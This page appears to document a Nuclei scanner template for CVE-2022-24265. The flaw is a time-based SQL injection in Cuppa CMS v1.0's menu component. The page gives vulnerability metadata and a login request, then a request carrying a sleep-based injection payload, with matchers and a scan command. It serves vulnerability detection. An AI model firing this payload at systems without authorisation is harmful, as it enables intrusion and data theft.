Cuppa CMS v1.0 - SQL injection
ID: CVE-2022-24265
Severity: high
Author: theamanrawat
Tags: time-based-sqli,cve2022,cve,sqli,cuppa,authenticated,cuppacms
Description
Section titled “Description”Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter.
YAML Source
Section titled “YAML Source”id: CVE-2022-24265
info: name: Cuppa CMS v1.0 - SQL injection author: theamanrawat severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/&menu_filter=3 parameter. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-24265 - https://github.com/truonghuuphuc/CVE - https://github.com/Nguyen-Trung-Kien/CVE-1 - https://github.com/oxf5/CVE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-24265 cwe-id: CWE-89 epss-score: 0.05054 epss-percentile: 0.92726 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: cuppacms product: cuppacms tags: time-based-sqli,cve2022,cve,sqli,cuppa,authenticated,cuppacms
http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login - | @timeout: 20s POST /components/menu/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8
path=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185
matchers: - type: dsl dsl: - 'duration>=6' - 'status_code_2 == 200' - 'contains(content_type_2, "text/html")' - 'contains(body_2, "menu/html/edit.php")' condition: and# digest: 4a0a00473045022100aab698bc72a5339baaa128c23d46270140c718370d7276f0a741a4e2520f8d2a0220743eee4ec1748dd85100b46223a46e6230123e22d2bfa42e484ff03d616e2b43:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-24265.yaml"